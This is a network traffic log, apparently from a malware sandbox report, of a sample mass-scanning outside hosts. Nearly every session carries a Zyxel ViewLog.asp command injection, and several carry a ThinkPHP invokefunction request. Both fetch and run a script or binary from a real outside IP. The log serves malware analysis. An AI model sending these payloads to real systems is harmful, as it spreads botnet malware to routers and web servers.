                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            267192.168.2.234454485.73.164.678080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.551295996 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:25.792731047 CET411INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 10:28:24 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            268192.168.2.234711494.123.13.1328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.558650970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            269192.168.2.234583094.120.245.138080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.558964014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            270192.168.2.235519262.29.55.1238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.560014963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            271192.168.2.236026262.249.167.298080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.797602892 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            272192.168.2.233440885.67.79.198080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.804229021 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:27.039581060 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:28.479552984 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:31.422976017 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:37.310185909 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:48.828551054 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:11.865382910 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:58.962765932 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            273192.168.2.234900831.220.53.1168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.811851025 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            274192.168.2.235671888.198.7.1680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.812418938 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:26.022099018 CET315INHTTP/1.1 400 Bad Request
                                                            Server: openresty
                                                            Date: Wed, 14 Feb 2024 08:28:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            275192.168.2.235943031.200.83.678080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.817118883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            276192.168.2.235559888.214.19.7580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:25.849009991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:26.361056089 CET64INHTTP/1.1 400 Bad Request
                                                            Connection: Keep-Alive
                                                            Feb 14, 2024 09:28:26.361224890 CET17INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            277192.168.2.233794294.122.17.448080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:26.044621944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            278192.168.2.233416094.123.103.1328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:26.046473980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            279192.168.2.235820095.217.210.6680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:26.069185019 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:26.289622068 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:28:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            280192.168.2.233289894.110.121.818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:26.133830070 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            281192.168.2.233997031.136.71.2028080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.575217962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:29.215432882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:30.495201111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.214796066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:38.334039927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:48.572602034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:09.817572117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:50.771936893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
